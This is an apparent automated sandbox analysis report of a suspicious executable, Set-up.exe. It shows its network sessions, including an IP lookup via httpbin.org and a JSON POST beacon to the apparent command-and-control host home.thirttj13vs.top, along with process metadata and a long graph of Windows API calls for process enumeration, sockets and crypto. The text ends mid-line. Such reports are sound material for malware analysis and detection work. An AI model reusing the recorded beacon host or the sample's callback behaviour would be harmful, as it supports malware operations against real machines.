                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                  Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  2192.168.2.54973334.147.147.173804764C:\Users\user\Desktop\Set-up.exe
                                  TimestampBytes transferredDirectionData
                                  Jan 7, 2025 14:38:21.359623909 CET173OUTPOST /jhkNTMUXVuSQJmAfrHzR1736163221 HTTP/1.1
                                  Host: home.thirttj13vs.top
                                  Accept: */*
                                  Content-Type: application/json
                                  Content-Length: 31
                                  Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                  Data Ascii: { "id1": "0", "data": "Done1" }
                                  Jan 7, 2025 14:38:22.070503950 CET353INHTTP/1.1 404 NOT FOUND
                                  server: nginx/1.22.1
                                  date: Tue, 07 Jan 2025 13:38:21 GMT
                                  content-type: text/html; charset=utf-8
                                  content-length: 207
                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                  Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.54970450.19.58.1134434764C:\Users\user\Desktop\Set-up.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-07 13:38:01 UTC52OUTGET /ip HTTP/1.1
                                  Host: httpbin.org
                                  Accept: */*
                                  2025-01-07 13:38:01 UTC224INHTTP/1.1 200 OK
                                  Date: Tue, 07 Jan 2025 13:38:01 GMT
                                  Content-Type: application/json
                                  Content-Length: 31
                                  Connection: close
                                  Server: gunicorn/19.9.0
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Credentials: true
                                  2025-01-07 13:38:01 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                  Data Ascii: { "origin": "8.46.123.189"}


                                  Click to jump to process

                                  Click to jump to process

                                  Click to dive into process behavior distribution

                                  Target ID:0
                                  Start time:08:37:59
                                  Start date:07/01/2025
                                  Path:C:\Users\user\Desktop\Set-up.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\Set-up.exe"
                                  Imagebase:0xc80000
                                  File size:7'343'240 bytes
                                  MD5 hash:E52DA29CA9214E322BA939105A9D6BB8
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:1.6%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:30.8%
                                    Total number of Nodes:1603
                                    Total number of Limit Nodes:74
                                    execution_graph 97769 c92cc0 122 API calls 97770 dda4d0 88 API calls 97771 ff28f0 16 API calls 97773 c824d1 strstr 97774 c938d0 QueryPerformanceCounter GetTickCount 97775 f9bce0 74 API calls 97776 ca2ed0 87 API calls 97777 fb9ae0 memcpy memcpy memset memset 97779 cfe4d0 239 API calls 96161 1153f30 96180 100dd50 96161->96180 96164 1153f66 96169 1153fa6 96170 1008f70 8 API calls 96171 1153faf GetVersion CryptAcquireContextA 96170->96171 96172 1154006 CryptGenRandom CryptReleaseContext 96171->96172 96173 1154050 GetLastError __acrt_iob_func 96171->96173 96174 1154044 96172->96174 96175 1154090 GetLastError __acrt_iob_func 96172->96175 96198 100b500 42 API calls 96173->96198 96199 100b500 42 API calls 96175->96199 96177 1154079 _time32 96179 11540b9 96179->96177 96200 1017430 __acrt_iob_func 96180->96200 96182 100dd61 96204 100d1d0 _errno 96182->96204 96184 100dd89 96219 10174a0 __acrt_iob_func 96184->96219 96186 100dd93 96186->96164 96187 1008f70 96186->96187 96227 1008e90 _open 96187->96227 96189 1008f82 96190 1008e90 8 API calls 96189->96190 96191 1008fa2 96190->96191 96192 1008f70 8 API calls 96191->96192 96193 1008fb8 96192->96193 96194 10112c0 96193->96194 96195 10112cc 96194->96195 96240 100e050 96195->96240 96198->96177 96199->96179 96201 1017458 EnterCriticalSection 96200->96201 96202 1017448 __acrt_iob_func 96200->96202 96201->96182 96202->96201 96203 1017470 __acrt_iob_func _lock 96202->96203 96203->96182 96206 100d287 96204->96206 96213 100d3ae 96204->96213 96205 100d340 fputc 96205->96206 96206->96205 96208 100b640 fputc 96206->96208 96209 100d504 localeconv 96206->96209 96210 100db9c 96206->96210 96211 100ca50 29 API calls 96206->96211 96212 100c9c0 28 API calls 96206->96212 96206->96213 96217 100b9d0 fputc fputc fputc 96206->96217 96218 100cc90 10 API calls 96206->96218 96225 100b6a0 fputc fputc WideCharToMultiByte _errno 96206->96225 96208->96206 96224 10178b0 IsDBCSLeadByteEx MultiByteToWideChar MultiByteToWideChar _errno 96209->96224 96226 100b9d0 fputc fputc fputc 96210->96226 96211->96206 96212->96206 96213->96184 96216 100dbb7 96216->96184 96217->96206 96218->96206 96220 10174c8 LeaveCriticalSection 96219->96220 96221 10174b8 __acrt_iob_func 96219->96221 96220->96186 96221->96220 96222 10174e0 __acrt_iob_func 96221->96222 96223 1017ad0 _unlock 96222->96223 96224->96206 96225->96206 96226->96216 96229 1008eba 96227->96229 96228 1008ef3 _exit 96228->96229 96229->96228 96230 115e6d0 96229->96230 96231 1008f39 _write 96229->96231 96232 1008f53 _close 96229->96232 96233 115e6e9 96230->96233 96234 115e6ea CryptAcquireContextA 96230->96234 96231->96229 96231->96232 96232->96229 96233->96189 96235 115e721 96234->96235 96236 115e739 CryptGenRandom 96234->96236 96235->96189 96237 115e766 CryptReleaseContext 96236->96237 96238 115e75d 96236->96238 96237->96235 96238->96237 96239 115e77d CryptReleaseContext 96238->96239 96239->96235 96241 100f886 _errno 96240->96241 96242 100e09d localeconv localeconv 96240->96242 96374 100e503 96241->96374 96283 100e0ce 96242->96283 96243 100f993 96247 100f9b5 realloc 96243->96247 96255 100f9c5 96243->96255 96244 100e300 strlen 96386 1017a50 IsDBCSLeadByteEx MultiByteToWideChar MultiByteToWideChar _errno 96244->96386 96246 100e146 isspace 96246->96283 96247->96255 96248 100df60 getc 96248->96283 96249 100f603 96256 100edb0 96249->96256 96266 100f61b 96249->96266 96250 100e243 96252 100e28c 96250->96252 96385 100df60 getc 96250->96385 96258 100e2d1 96252->96258 96262 100e2c0 free 96252->96262 96253 100f674 96253->96256 96257 100f69b 96253->96257 96254 100e214 96254->96169 96254->96170 96395 100ded0 6 API calls 96255->96395 96391 100dde0 free free free 96256->96391 96260 100e1e1 96257->96260 96271 100f6b0 free 96257->96271 96263 100e2f1 free 96258->96263 96264 100e2e1 free 96258->96264 96259 100e176 isspace 96259->96283 96269 100e1f1 free 96260->96269 96270 100e205 free 96260->96270 96262->96258 96262->96262 96263->96254 96264->96263 96266->96260 96281 100f630 free 96266->96281 96267 100f54c 96274 1010250 ungetc 96267->96274 96275 100f564 96267->96275 96268 100e18e 96277 100ed90 ungetc 96268->96277 96278 100e1a6 96268->96278 96269->96270 96270->96254 96271->96260 96271->96271 96272 100e261 isspace 96272->96250 96361 100e26f 96272->96361 96273 100f5b6 96273->96260 96303 100f5d0 free 96273->96303 96284 1010274 strtoul 96274->96284 96275->96256 96279 100f58b 96275->96279 96276 1010178 96276->96260 96282 1010184 free 96276->96282 96277->96256 96278->96260 96288 100e1d0 free 96278->96288 96279->96260 96296 100f5a0 free 96279->96296 96280 100ecc8 _errno _errno 96305 100e4b0 96280->96305 96281->96260 96281->96281 96282->96260 96282->96282 96283->96244 96283->96246 96283->96248 96283->96250 96283->96253 96283->96259 96283->96267 96283->96268 96291 100e560 isspace 96283->96291 96292 100e582 96283->96292 96295 100e388 96283->96295 96283->96374 96312 100edf6 96284->96312 96284->96374 96285 100fee7 96396 100dff0 ungetc 96285->96396 96286 100fed7 tolower 96286->96285 96286->96374 96287 100de60 realloc malloc free 96359 100ea71 96287->96359 96288->96260 96288->96288 96289 100ed17 _errno 96289->96249 96289->96305 96290 100feb6 isxdigit 96290->96359 96290->96374 96291->96283 96292->96256 96302 100e58e 96292->96302 96293 1010742 ungetc 96293->96252 96295->96273 96295->96305 96296->96260 96296->96296 96297 100eb52 96300 100eb63 96297->96300 96301 100e81a 96297->96301 96298 100df60 getc 96298->96359 96307 100f0d5 96300->96307 96308 100eb7a 96300->96308 96310 100e8d5 96301->96310 96314 100edcd 96301->96314 96325 100e850 96301->96325 96326 100ec18 96301->96326 96302->96260 96319 100e5a0 free 96302->96319 96303->96260 96303->96303 96305->96249 96305->96276 96305->96280 96305->96289 96305->96297 96306 100ed02 isspace 96305->96306 96317 100e527 96305->96317 96323 100e6b9 96305->96323 96334 10100b8 ungetc 96305->96334 96305->96374 96390 100df60 getc 96305->96390 96306->96305 96318 100e626 _errno 96306->96318 96393 100df60 getc 96307->96393 96313 101084d 96308->96313 96308->96326 96330 100ebac malloc 96308->96330 96308->96374 96309 1010810 96309->96312 96309->96313 96310->96312 96388 100df60 getc 96310->96388 96311 100e765 96311->96312 96387 100df60 getc 96311->96387 96392 100ded0 6 API calls 96312->96392 96399 100ded0 6 API calls 96313->96399 96314->96310 96314->96326 96315 10103d9 tolower 96315->96374 96317->96260 96333 100e538 free 96317->96333 96318->96305 96319->96260 96319->96319 96320 10111a4 ungetc 96320->96374 96322 100ee26 96322->96311 96322->96326 96323->96311 96323->96322 96323->96326 96328 100e6e4 96323->96328 96323->96374 96325->96313 96331 100e86d malloc 96325->96331 96326->96312 96326->96359 96389 100df60 getc 96326->96389 96327 1010438 tolower 96327->96285 96327->96374 96328->96313 96335 100e701 malloc 96328->96335 96329 100e778 96338 10108f9 96329->96338 96329->96374 96330->96255 96339 100ebd2 96330->96339 96331->96255 96342 100e897 96331->96342 96332 1010927 96332->96256 96340 101094c 96332->96340 96333->96260 96333->96333 96334->96305 96335->96255 96345 100e71f 96335->96345 96337 10108d7 ungetc 96337->96359 96338->96256 96347 1010905 96338->96347 96349 100ebe6 malloc 96339->96349 96357 100ec0a 96339->96357 96340->96260 96350 1010958 free 96340->96350 96351 100e8ab malloc 96342->96351 96358 100e8c7 96342->96358 96343 100df60 getc 96343->96374 96344 100ea53 malloc 96344->96255 96344->96359 96355 100e733 malloc 96345->96355 96364 100e74f 96345->96364 96346 100f0e8 96346->96312 96346->96374 96394 100df60 getc 96346->96394 96347->96260 96356 1010911 free 96347->96356 96348 100e7ac isspace 96348->96374 96349->96357 96350->96260 96350->96350 96351->96358 96352 100e96f realloc 96352->96374 96353 100eb2d isspace 96353->96374 96355->96364 96356->96260 96356->96356 96357->96326 96358->96310 96359->96274 96359->96287 96359->96298 96359->96315 96359->96337 96362 100ea85 malloc 96359->96362 96366 100f293 strtoll 96359->96366 96359->96374 96361->96252 96361->96293 96362->96359 96363 1010e3e ungetc 96363->96374 96364->96311 96365 10178b0 IsDBCSLeadByteEx MultiByteToWideChar MultiByteToWideChar _errno 96365->96374 96366->96312 96366->96359 96367 100fc5e strtol 96367->96312 96367->96374 96369 1010d20 _errno 96369->96374 96370 100ec9a realloc 96370->96374 96371 1010006 ungetc 96371->96374 96372 1010054 realloc 96372->96374 96373 1010e5d realloc 96373->96374 96374->96241 96374->96243 96374->96253 96374->96255 96374->96256 96374->96284 96374->96285 96374->96286 96374->96290 96374->96309 96374->96312 96374->96313 96374->96317 96374->96320 96374->96327 96374->96332 96374->96337 96374->96343 96374->96344 96374->96348 96374->96352 96374->96353 96374->96359 96374->96361 96374->96363 96374->96365 96374->96367 96374->96369 96374->96370 96374->96371 96374->96372 96374->96373 96375 1010f38 96374->96375 96376 100fc10 realloc 96374->96376 96377 100ed2c _errno 96374->96377 96378 100ed5e _errno 96374->96378 96379 100dda0 realloc 96374->96379 96397 100dff0 ungetc 96374->96397 96398 100b1a0 7 API calls 96374->96398 96400 100ded0 6 API calls 96375->96400 96376->96374 96377->96260 96380 100ed43 96377->96380 96378->96260 96383 100ed75 96378->96383 96379->96374 96382 100ed48 free 96380->96382 96382->96260 96382->96382 96384 100ed78 free 96383->96384 96384->96260 96384->96384 96385->96272 96386->96283 96387->96329 96388->96374 96389->96374 96390->96305 96391->96254 96392->96254 96393->96346 96394->96346 96395->96254 96396->96312 96397->96374 96398->96374 96399->96254 96400->96254 97780 c814e0 GetModuleHandleA LoadLibraryA GetProcAddress GetProcAddress _crt_atexit 97782 c816e3 44 API calls 97784 ddf0f0 96 API calls 97787 cd16f0 83 API calls 97788 dd9ce0 89 API calls 97790 ffa0c0 22 API calls 97791 e07ca0 65 API calls 97792 d28a90 memcpy _byteswap_uint64 97793 f41eb0 84 API calls 97794 d6c290 338 API calls 97795 c93e80 14 API calls 96778 cb9480 96791 c87770 96778->96791 96781 cb94df WSAGetLastError 96783 cb94fb 96781->96783 96787 cb94c9 96781->96787 96782 cb94da 96784 cb9589 96782->96784 96808 c9d8c0 96782->96808 96805 c9d090 66 API calls 96783->96805 96786 cb950f 96806 cc4f40 52 API calls 96786->96806 96787->96782 96807 cc50a0 51 API calls 96787->96807 96792 c87790 96791->96792 96793 c877b6 recv 96791->96793 96792->96793 96796 c87799 96792->96796 96794 c8782e 96793->96794 96795 c877c4 96793->96795 96794->96781 96794->96787 96812 c872a0 50 API calls 96795->96812 96797 c877db 96796->96797 96798 c877a3 recv 96796->96798 96813 c872a0 50 API calls 96797->96813 96798->96795 96800 c877d4 96800->96794 96802 c877ec __acrt_iob_func 96814 c8cb20 78 API calls 96802->96814 96804 c8780c fflush _errno 96804->96794 96805->96786 96806->96787 96807->96782 96809 c9d968 GetTickCount 96808->96809 96810 c9d8dd QueryPerformanceCounter 96808->96810 96811 c9d913 96809->96811 96810->96811 96811->96784 96812->96800 96813->96802 96814->96804 97796 fd1ab0 21 API calls 97797 c83686 385 API calls 97798 d27280 _assert 97306 cb9290 97307 c876a0 84 API calls 97306->97307 97308 cb92e5 97307->97308 97309 cb93c3 WSAGetLastError 97308->97309 97310 cb92f3 97308->97310 97311 cb93e5 97309->97311 97318 cb9392 97309->97318 97312 c9d8c0 2 API calls 97310->97312 97310->97318 97323 c9d090 66 API calls 97311->97323 97316 cb930b 97312->97316 97314 cb93f7 97324 cc4f40 52 API calls 97314->97324 97315 cb93be 97316->97318 97319 cb9335 WSAIoctl 97316->97319 97318->97315 97325 cc50a0 51 API calls 97318->97325 97319->97318 97321 cb9366 97319->97321 97321->97318 97322 cb9371 setsockopt 97321->97322 97322->97318 97323->97314 97324->97318 97325->97315 97800 d47eb0 14 API calls 97801 c820ad 392 API calls 97803 cccaa0 314 API calls 97804 df26b0 24 API calls 97805 ef3680 88 API calls 97198 c83ab0 AcquireSRWLockExclusive 97199 c83acb ReleaseSRWLockExclusive 97198->97199 97200 c83ac3 97198->97200 97200->97199 97201 c83ad6 97200->97201 97205 c9d7b0 97201->97205 97203 c83aeb 97204 c83af3 ReleaseSRWLockExclusive 97203->97204 97206 c9d7d9 97205->97206 97207 c9d7be FreeLibrary 97205->97207 97208 c9d7de 97206->97208 97209 c9d7e0 WSACleanup 97206->97209 97207->97206 97208->97203 97210 c90ab0 97213 c905b0 97210->97213 97214 c907c7 97213->97214 97221 c905bd 97213->97221 97215 c9066a 97247 cbdec0 97215->97247 97217 c906f0 97222 c907ef 97217->97222 97227 c9075f getsockopt 97217->97227 97228 c90707 WSAEventSelect 97217->97228 97259 c876a0 97217->97259 97220 c9067b 97220->97217 97237 c907ce 97220->97237 97258 c973b0 83 API calls 97220->97258 97221->97214 97221->97215 97221->97237 97256 c903c0 52 API calls 97221->97256 97257 c97450 83 API calls 97221->97257 97252 c93000 97222->97252 97226 c90802 97229 c90861 WSAWaitForMultipleEvents 97226->97229 97230 c90a2f 97226->97230 97274 c96fa0 97226->97274 97227->97217 97228->97217 97228->97237 97240 c90854 97229->97240 97230->97237 97293 c92f10 QueryPerformanceCounter GetTickCount 97230->97293 97235 c90a19 WSAResetEvent 97235->97230 97236 c90a6b 97236->97237 97239 c90a87 97236->97239 97273 c97380 50 API calls 97237->97273 97238 c908c8 WSAEnumNetworkEvents 97238->97240 97294 c96df0 Sleep WSASetLastError 97239->97294 97240->97238 97242 c90928 WSAEventSelect 97240->97242 97246 c90970 97240->97246 97242->97240 97243 c90a94 97243->97237 97244 c909e8 WSAEnumNetworkEvents 97245 c909d0 WSAEventSelect 97244->97245 97244->97246 97245->97244 97245->97246 97246->97235 97246->97244 97246->97245 97248 cbdf1e 97247->97248 97250 cbdece 97247->97250 97295 cbdf30 97250->97295 97251 cbdef9 97251->97220 97253 c93018 97252->97253 97255 c93031 97252->97255 97254 c9d8c0 2 API calls 97253->97254 97253->97255 97254->97255 97255->97226 97256->97221 97257->97221 97258->97220 97260 c876c0 97259->97260 97261 c876e6 send 97259->97261 97260->97261 97262 c876c9 97260->97262 97263 c8775e 97261->97263 97264 c876f4 97261->97264 97265 c8770b 97262->97265 97266 c876d3 send 97262->97266 97263->97217 97303 c872a0 50 API calls 97264->97303 97304 c872a0 50 API calls 97265->97304 97266->97264 97268 c87704 97268->97263 97270 c8771c __acrt_iob_func 97305 c8cb20 78 API calls 97270->97305 97272 c8773c fflush _errno 97272->97263 97273->97214 97275 c96feb 97274->97275 97276 c96fd4 97274->97276 97277 c90847 97275->97277 97278 c96fff Sleep 97275->97278 97279 c97186 WSASetLastError 97275->97279 97276->97275 97288 c9701b 97276->97288 97277->97229 97277->97237 97277->97240 97278->97277 97279->97277 97280 c97176 97283 c97207 select 97280->97283 97281 c971aa 97282 c9730b 97281->97282 97285 c971cc Sleep 97281->97285 97286 c97331 WSASetLastError 97281->97286 97282->97277 97284 c97312 WSAGetLastError 97282->97284 97283->97282 97292 c97233 97283->97292 97284->97277 97285->97277 97287 c971ec 97285->97287 97286->97277 97286->97282 97287->97284 97288->97280 97288->97281 97289 c9726b __WSAFDIsSet 97290 c9729a __WSAFDIsSet 97289->97290 97289->97292 97291 c972ba __WSAFDIsSet 97290->97291 97290->97292 97291->97292 97292->97277 97292->97289 97292->97290 97292->97291 97293->97236 97294->97243 97296 cbdf44 97295->97296 97298 cbdfb9 97296->97298 97300 cbdfb5 97296->97300 97301 c97450 83 API calls 97296->97301 97302 c97380 50 API calls 97298->97302 97300->97251 97301->97296 97302->97300 97303->97268 97304->97270 97305->97272 97326 cb6ab0 97336 d40870 EnterCriticalSection LeaveCriticalSection 97326->97336 97328 cb6ad5 97329 cb6bb4 97328->97329 97331 c96fa0 9 API calls 97328->97331 97330 d35ed0 98 API calls 97329->97330 97332 cb6ba9 97330->97332 97333 cb6b54 97331->97333 97333->97329 97333->97332 97334 cb6b5d 97333->97334 97334->97332 97337 d35ed0 97334->97337 97336->97328 97340 d35a50 97337->97340 97341 d35ea9 97340->97341 97342 d35a58 97340->97342 97341->97334 97376 d486d0 EnterCriticalSection 97342->97376 97344 d35a71 97345 d488b0 2 API calls 97344->97345 97346 d35a7e 97345->97346 97347 d35a99 97346->97347 97349 d35b50 97346->97349 97356 d35b88 97346->97356 97381 d3d920 memset 97347->97381 97354 d35eb4 97349->97354 97355 d35b7a 97349->97355 97349->97356 97350 d35e96 97421 d49480 62 API calls 97350->97421 97352 d35ea0 97422 d486f0 LeaveCriticalSection 97352->97422 97360 d36f10 89 API calls 97354->97360 97383 d370a0 97355->97383 97374 d35cae 97356->97374 97410 d36d50 44 API calls 97356->97410 97411 d35ef0 61 API calls 97356->97411 97357 d35aa2 97357->97356 97358 d35b9e 97357->97358 97382 d3dc70 memset memmove memmove memset 97357->97382 97393 d3da40 memmove 97358->97393 97364 d35ec2 97360->97364 97364->97364 97365 d35be2 __WSAFDIsSet 97368 d35bac 97365->97368 97366 d35da1 __WSAFDIsSet 97366->97374 97368->97356 97368->97365 97370 d370a0 89 API calls 97368->97370 97394 d36f10 97368->97394 97370->97368 97372 d35d3f WSAGetLastError 97372->97374 97374->97350 97374->97366 97374->97372 97377 d4a920 97374->97377 97412 d36d50 44 API calls 97374->97412 97413 d49320 97374->97413 97376->97344 97378 d4a944 97377->97378 97379 d4a94b 97378->97379 97380 d4a977 send 97378->97380 97379->97374 97380->97374 97381->97357 97382->97357 97384 d370ae 97383->97384 97385 d3717f WSAGetLastError 97384->97385 97391 d371a7 97384->97391 97423 d4a8c0 97384->97423 97427 d371c0 97384->97427 97386 d3718b 97385->97386 97386->97391 97465 d36d50 44 API calls 97386->97465 97389 d3719f 97390 d49320 62 API calls 97389->97390 97390->97391 97391->97356 97393->97368 97395 d46050 memmove 97394->97395 97396 d36f35 97395->97396 97409 d37019 97396->97409 97485 d4a870 97396->97485 97398 d36f4e 97400 d3702d 97398->97400 97405 d36f61 97398->97405 97399 d49320 62 API calls 97404 d3701d 97399->97404 97401 d3705d WSAGetLastError 97400->97401 97402 d3703d 97400->97402 97401->97402 97402->97404 97489 d36d50 44 API calls 97402->97489 97404->97368 97405->97404 97406 d371c0 86 API calls 97405->97406 97407 d37082 97405->97407 97406->97405 97490 d36d50 44 API calls 97407->97490 97409->97399 97410->97356 97411->97356 97412->97374 97415 d49345 97413->97415 97414 d488b0 2 API calls 97418 d493af 97414->97418 97415->97414 97417 d493ee 97491 d4b020 97417->97491 97418->97417 97496 d35ef0 61 API calls 97418->97496 97420 d49422 97420->97374 97421->97352 97422->97341 97424 d4a8e6 97423->97424 97425 d4a903 recvfrom 97423->97425 97424->97425 97426 d4a8ed 97424->97426 97425->97426 97426->97384 97428 d417d0 18 API calls 97427->97428 97435 d371e6 97428->97435 97429 d371f2 97429->97384 97430 d3731d 97466 d4bc80 97430->97466 97432 d3739d 97434 d373c9 97432->97434 97441 d373e3 97432->97441 97433 d3734e 97433->97429 97433->97432 97442 d374c2 97433->97442 97440 d36050 61 API calls 97434->97440 97435->97429 97435->97430 97436 d372f9 _stricmp 97435->97436 97438 d3731f strcmp 97435->97438 97436->97429 97436->97435 97437 d37417 97472 d37b10 19 API calls 97437->97472 97438->97429 97438->97435 97440->97429 97441->97437 97443 d3740d 97441->97443 97476 d37620 memmove 97442->97476 97478 d36d50 44 API calls 97443->97478 97445 d374c9 97445->97434 97448 d374d1 97445->97448 97447 d37422 97450 d37460 97447->97450 97461 d374b0 97447->97461 97473 d3f180 memset memset 97447->97473 97477 d36ca0 memset memset WakeAllConditionVariable QueryPerformanceFrequency QueryPerformanceCounter 97448->97477 97449 d37504 97479 d35ef0 61 API calls 97449->97479 97450->97461 97474 d45ca0 memset 97450->97474 97455 d37572 97482 d3f400 memset memset 97455->97482 97457 d37498 97457->97461 97475 d3c2d0 38 API calls 97457->97475 97460 d374a9 97460->97461 97480 d46150 memmove memmove 97460->97480 97481 d4c320 QueryPerformanceFrequency QueryPerformanceCounter 97461->97481 97463 d3758c 97483 d48880 WakeAllConditionVariable 97463->97483 97465->97389 97467 d4bca1 97466->97467 97468 d4bdb9 97467->97468 97469 d4bd99 memcpy 97467->97469 97471 d4bcf1 97467->97471 97468->97471 97484 d35ef0 61 API calls 97468->97484 97469->97468 97471->97433 97472->97447 97473->97450 97474->97457 97475->97460 97476->97445 97477->97429 97478->97449 97479->97429 97480->97461 97481->97455 97482->97463 97483->97429 97484->97471 97486 d4a88c 97485->97486 97487 d4a8aa recv 97485->97487 97486->97487 97488 d4a893 97486->97488 97487->97398 97488->97398 97489->97409 97490->97409 97492 d4b052 97491->97492 97493 d4b029 97491->97493 97492->97420 97494 d4b04b closesocket 97493->97494 97495 d4b03e 97493->97495 97494->97492 97495->97420 97496->97418 97809 cc8ab0 125 API calls 97811 ddeca0 21 API calls 97812 fd9e80 memcpy memcpy 97813 df2ea0 51 API calls 97814 eedc6c 6 API calls 96401 115b990 96418 1011360 96401->96418 96403 115b9c2 96404 115b9ce 96403->96404 96405 1008f70 8 API calls 96403->96405 96406 115b9d7 96405->96406 96407 1011360 32 API calls 96406->96407 96408 115ba13 96407->96408 96409 115ba68 96408->96409 96410 115ba18 96408->96410 96425 115b720 96409->96425 96433 1011420 33 API calls 96410->96433 96413 115ba2c 96415 115ba8d 96413->96415 96416 115b720 4 API calls 96413->96416 96414 115ba7f 96415->96414 96417 115ba4b free 96416->96417 96419 10113b0 96418->96419 96420 1011379 96418->96420 96422 100d1d0 32 API calls 96419->96422 96421 100d1d0 32 API calls 96420->96421 96423 1011398 96421->96423 96424 10113d0 96422->96424 96423->96403 96424->96403 96426 115b731 96425->96426 96427 115b788 _errno 96425->96427 96426->96427 96429 115b73f 96426->96429 96428 115b77d 96427->96428 96428->96414 96430 115b757 memcpy 96429->96430 96434 115b690 96429->96434 96430->96428 96433->96413 96435 115b6c2 96434->96435 96436 115b69e 96434->96436 96435->96428 96435->96430 96437 115b6a6 realloc 96436->96437 96438 115b6dc _errno 96436->96438 96437->96435 96438->96435 97815 d8da50 87 API calls 97817 c81e46 394 API calls 97818 cd2250 53 API calls 97819 cd9250 53 API calls 97820 cfbc50 397 API calls 97821 e29a50 60 API calls 97823 da8060 free 96815 cbe400 96816 cbe412 96815->96816 96820 cbe459 96815->96820 96817 cbe422 96816->96817 96846 cd3030 50 API calls 96816->96846 96847 ce09d0 50 API calls 96817->96847 96822 cbe4a8 96820->96822 96824 cbe495 96820->96824 96827 cbb5a0 96820->96827 96821 cbe42b 96848 cb68b0 81 API calls 96821->96848 96824->96822 96826 cbb5a0 54 API calls 96824->96826 96826->96822 96828 cbb5c0 96827->96828 96838 cbb5d2 96827->96838 96829 c9d8c0 2 API calls 96828->96829 96828->96838 96830 cbb5f2 96829->96830 96831 cbb638 96830->96831 96832 cbb611 96830->96832 96850 cbec10 QueryPerformanceCounter GetTickCount 96831->96850 96849 cbec70 QueryPerformanceCounter GetTickCount 96832->96849 96835 cbb61b 96836 cbb713 96835->96836 96839 cbb626 96835->96839 96852 cc4f40 52 API calls 96836->96852 96838->96824 96839->96838 96840 cbb65a 96839->96840 96841 cbb72b 96839->96841 96842 cbb737 96839->96842 96851 cc50a0 51 API calls 96839->96851 96840->96838 96840->96841 96840->96842 96841->96838 96853 cc50a0 51 API calls 96841->96853 96842->96838 96854 cc50a0 51 API calls 96842->96854 96846->96817 96847->96821 96848->96820 96849->96835 96850->96839 96851->96839 96852->96838 96853->96838 96854->96838 97827 cd2c00 100 API calls 97829 def810 26 API calls 97830 cfbe00 76 API calls 97831 c8f610 191 API calls 97832 ca2410 272 API calls 97833 ca3610 53 API calls 97835 ce6810 21 API calls 97837 d6ee30 335 API calls 97838 c85220 112 API calls 97839 ca2e20 88 API calls 97840 ca7c20 85 API calls 97841 eb3200 47 API calls 97842 fdf010 37 API calls 97843 e52e10 78 API calls 97845 c81830 50 API calls 97846 e9fa10 187 API calls 97847 ca2230 55 API calls 97849 ccd630 166 API calls 97850 cd0030 94 API calls 97851 ffa000 memset memset 97852 c8d5c0 52 API calls 97853 d9e7d0 165 API calls 97855 da63d0 44 API calls 97856 df33d0 _gmtime64 97858 ce25d0 129 API calls 97730 c831d7 CreateToolhelp32Snapshot 97731 c83200 97730->97731 97732 c83223 97730->97732 97746 c815b0 42 API calls 97731->97746 97733 1155ff0 5 API calls 97732->97733 97734 c83232 Process32First 97733->97734 97735 c832dc CloseHandle 97734->97735 97743 c83255 97734->97743 97737 11563e0 13 API calls 97735->97737 97739 c8321e 97737->97739 97738 11562c0 7 API calls 97738->97743 97741 11563e0 13 API calls 97741->97743 97742 11561f0 malloc 97742->97743 97743->97738 97743->97741 97743->97742 97744 c832bc Process32Next 97743->97744 97745 1156350 strlen 97743->97745 97744->97735 97744->97743 97746->97739 97859 cfedd0 75 API calls 96440 e5cbc0 96441 e5cbcc 96440->96441 96442 e5cbce free 96440->96442 96441->96442 96443 c871e0 96444 c87202 96443->96444 96445 c871f0 96443->96445 96448 c87227 96444->96448 96451 c87240 96444->96451 96445->96444 96446 c8724d 96445->96446 96456 c872a0 50 API calls 96446->96456 96455 c872a0 50 API 